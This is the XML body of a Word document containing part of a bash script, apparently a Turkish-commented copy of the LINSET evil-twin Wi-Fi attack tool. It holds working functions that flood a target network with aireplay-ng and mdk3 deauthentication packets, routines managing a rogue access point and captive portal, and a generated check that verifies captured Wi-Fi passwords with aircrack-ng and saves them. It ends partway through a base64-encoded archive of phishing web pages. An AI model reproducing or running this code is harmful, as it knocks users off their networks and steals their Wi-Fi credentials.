    <w:p w14:paraId="5ACAB8F6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>killall wpa_supplicant &amp;&gt;$linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E268E3C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>killall wpa_passphrase &amp;&gt;$linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182B579C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>kesilmesayisi=999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CCBDE8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>a=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369E5D00" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo -e ""$beyaz"["$kirmizi"-"$beyaz"] "$beyaz"Arayüz öldürüldü "$yesil"$WIFI_MONITOR"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74629C2B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>airmon-ng stop $WIFI_MONITOR &amp;&gt; $linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060E0F4B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo -e ""$beyaz"["$kirmizi"-"$beyaz"] "$beyaz"Arayüz öldürüldü "$yesil"$WIFI_MONITOR"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646D527D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>airmon-ng stop $WIFI_MONITOR2 &amp;&gt; $linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51025FA0" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo \"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631B4B46" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>LINSET $version by vk496</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2923A794" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E0A8DD" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>SSID: $Host_SSID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BB06CB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>BSSID: $Host_MAC ($Host_MAC_MODEL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020071CA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>Channel: $Host_CHAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661A1644" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>Security: $Host_ENC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D51E47" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>Time: \$ih\$horas:\$im\$minutos:\$is\$segundos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F73FAB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>Password: \$(cat $DUMP_PATH/data.txt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23524D9A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>\" &gt;$HOME/$Host_SSID-password.txt"&gt;&gt;$DUMP_PATH/handcheck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2777D58D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B485C70" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="620F02D6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if [ $authmode = "handshake" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74ECB6E3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">echo "aircrack-ng -a 2 -b $Host_MAC -0 -s $DUMP_PATH/$Host_MAC-01.cap -w $DUMP_PATH/data.txt &amp;&amp; echo &amp;&amp; echo -e \"Se ha guardado en "$kirmizi"$HOME/$Host_SSID-password.txt"$yenidenrenklendir"\" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383118ED" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"&gt;&gt;$DUMP_PATH/handcheck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E961CAE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD71E38" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAF3079" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>elif [ $authmode = "wpa_supplicant" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE35B9D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo "echo -e \"Se ha guardado en "$kirmizi"$HOME/$Host_SSID-password.txt"$yenidenrenklendir"\""&gt;&gt;$DUMP_PATH/handcheck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363E5EB7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C473AA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="38960ACA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>echo "kill -INT \$(ps a | grep bash| grep linset | awk '{print \$1}') &amp;&gt;$linset_output_device"&gt;&gt;$DUMP_PATH/handcheck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F28AC8A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>chmod +x $DUMP_PATH/handcheck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06701D14" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="16182DF5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A7D17E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="191C9F2D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A133100" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4BBAEB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="6D4EB531" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="7F8A013F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>############################################# &lt; ATAK &gt; ############################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5ED62E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="0D4B8C23" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="264BE412" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="487959B6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="7273666B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="502D05C4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="6A430372" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>############################################## &lt; DIGER &gt; ############################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E8250D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="0FE22823" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t># Herkesin yetkisini kaldır</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722A73F8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>function deauthall {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AFE634" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="341F557F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "GEÇİCİ AĞDAN DÜŞÜRME AİREPLAY $Host_SSID" -e aireplay-ng --deauth $DEAUTHTIME -a $Host_MAC --ignore-negative-one $WIFI_MONITOR &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311FC599" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>sleep 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEC5DF8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">}       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DDAF56" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="7B9C5194" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>function deauthmdk3 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F284B7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DA3454" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo "$Host_MAC" &gt;$DUMP_PATH/mdk3.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1637CF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "GEÇİCİ AĞDAN DÜŞÜRME MDK3 $Host_SSID" -e mdk3 $WIFI_MONITOR2 d -b $DUMP_PATH/mdk3.txt -c $Host_CHAN &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5567CA01" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>mdk3PID=$!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BD5EFC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>sleep 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F19C20" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>kill $mdk3PID &amp;&gt;$linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFF4268" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA34DE5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="69F03A48" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t># Belirli bir kisinin yetkisini kaldırma</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF8D22B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>function deauthesp {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A398AF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A253BFA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>sleep 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317ACDD2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Desautenticando a $Client_MAC" -e aireplay-ng -0 $DEAUTHTIME -a $Host_MAC -c $Client_MAC --ignore-negative-one $WIFI_MONITOR &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F36CFA0" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C7FAE8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="06F1383A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t># Tüm işlemleri kapatın</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F06C768" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>function matartodo {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721CE5C7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A7ED04" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>killall aireplay-ng &amp;&gt;$linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3C97AF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>kill $(ps a | grep python| grep fakedns | awk '{print $1}') &amp;&gt;$linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2193D743" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>killall hostapd &amp;&gt;$linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB5F224" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>killall lighttpd &amp;&gt;$linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42172FE3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>killall dhcpd &amp;&gt;$linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E94E505" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>killall xterm &amp;&gt;$linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0122A439" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2902C30D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0180DE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="56B9C45D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="2FAF01BF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="67E2CDAF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>############################################## &lt; DIGER &gt; ############################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F98F7D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="3B026AE1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="66CB039E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="1556B8FD" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="3B038DAA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="125E7EBD" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="4E30D32E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>######################################### &lt; WEB ARAYUZLERI &gt; ########################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4222603B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="3BD28D14" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t># Web arayüzünün içeriğini oluşturun</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177B0359" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>function NEUTRA {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653C20F5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC9369D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if [ ! -d $DUMP_PATH/data ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1840F62F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>mkdir $DUMP_PATH/data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F31380D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E400F6E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9CDE75" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>echo "UEsDBBQAAAAIAEZ8zkSJ9HAPjoIAAMRtAQATABwAanF1ZXJ5LTEuOC4zLm1pbi5qc1VUCQADVE+c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0EECC5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>U1RPnFN1eAsAAQQAAAAABAAAAACcfWl720aW7vf7K0RMRg2YRUrM0tMDCuZ4vXbfeOnYnaSHYvJA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9E193B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>ZFGCDQEMFi0h+d/nvKcWFEDIyZ08joil1lOnzl4HJ48GR5/+Ucvi/uhmMv7b+JujT7/hbrzMr492</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3ADA33" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>5iYvLk/SZCmzUh49Ovk//rrOllWSZ74UVbA1d0e/+jLY3sTFURW9mctFtN1PC1nVRXZ0M5bx8sqX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D1DAB4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>43KTJpV/HwiniSzYVvNsEQ1O94Go9ra5V3gnimCbrP0iiqLq+FiOs3wlP95vJN1PVGdJ5K3iKh55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BFEEC1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>w2xcyE0aL6X/XnijryZeMK7y7/NbWTyLS+kH0yKS40tZPamqIrmoK+knwZQar6i9fH1EfXglvcku</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593720E7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>PRpRcb8tInTrVUUtvdngNOS7dZyWuJ2o26xOU2+Gv+GwGHoePStmwyJ8Pq5kWflFMLsZb+KilH//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F62000" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>8O4t3YbFfhlXBIsy2O5vxhi5nuZeUsM0iGqvgVY0oHhqITtd54VfHSXZkWTAVBgEWvGOj2/GSfni</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273670ED" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>elPdv7v4JJeVL+fVIgiWeVYlWS15pgPMJ8dYvEB1M5jo/gj8tj9Z+cHWvrePK+exU7quMDz9XO52</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E96EE2A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>A4kpy6x6S4u127l3rfVzWo4rhUur/EhGGPf09ipJpS/dNR9gzQ1KyabymiszHkXVbneKmQIWLw2O</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3BB8B2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>VUFgEfGScISKO/hXGDwaDKrxMk5TPBPS9pTQWLO9whQ7lj9o0AwSaOtUV4hWuYiGrouop5mmkRbQ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21294CD2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>VEtJpfDLndk6SStJyEGDH2TBtIrcR8H+Tw2YwJY9KYr4npfjcXSqBt/AOq2aTb6s9H72dl4gMtpc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4874EB0E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>y0LGlXyeL+trWvCXRXyJX5+HnOm3L1KJh4Fa4Gqcyuyyugo6r+nFJt/4gV2FrBnD9xpZLHxoT+tq</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486A5EF6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>5dP7j/Hl2/iaWg7mpwtgX7zZyGz1jLpbEQXKbzNZmBF2+wycmT7RvbSWHShICH4zvorL57x3zQJM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C9EC45" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>ARPaxyIRJUH+V7WzA5Hbm0qUgaijcixvMFLApCaMl6ms5FFOLWarVIpcvwb1xF7PsNfrAJdFdCqS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6479D1EE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>qCZaqYE2Lc6SaTEcBjeq0jheraibTKDMvFgE+5wpzPGxry5oLPKuImj4271Qj9wpv9NT5qlMDyZu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30778083" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
